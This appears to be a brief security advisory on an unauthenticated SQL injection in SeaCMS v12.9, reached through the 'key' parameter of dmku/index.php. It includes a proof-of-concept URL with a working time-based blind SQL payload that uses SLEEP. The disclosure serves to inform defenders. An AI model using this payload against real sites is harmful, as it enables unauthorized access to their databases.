Unauthenticated SQL Injection in SeaCMS v12.9

[Tddddddddd]

Summary SeaCMS v12.9 suffers from an unauthenticated SQL injection vulnerability in the dmku/index.php file where user-supplied data is used directly in an SQL query without proper sanitization. No filtering found in source code Proof of Concept (PoC) http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1&type=list http(s)://ip:port//js/player/dmplayer/dmku/?ac=so&key=1' AND (SELECT 1806 FROM (SELECT(SLEEP(5)))npVX)-- OXgJ&type=list Impact This vulnerability allows unauthenticated remote attackers to inject arbitrary SQL commands through the "key" parameter.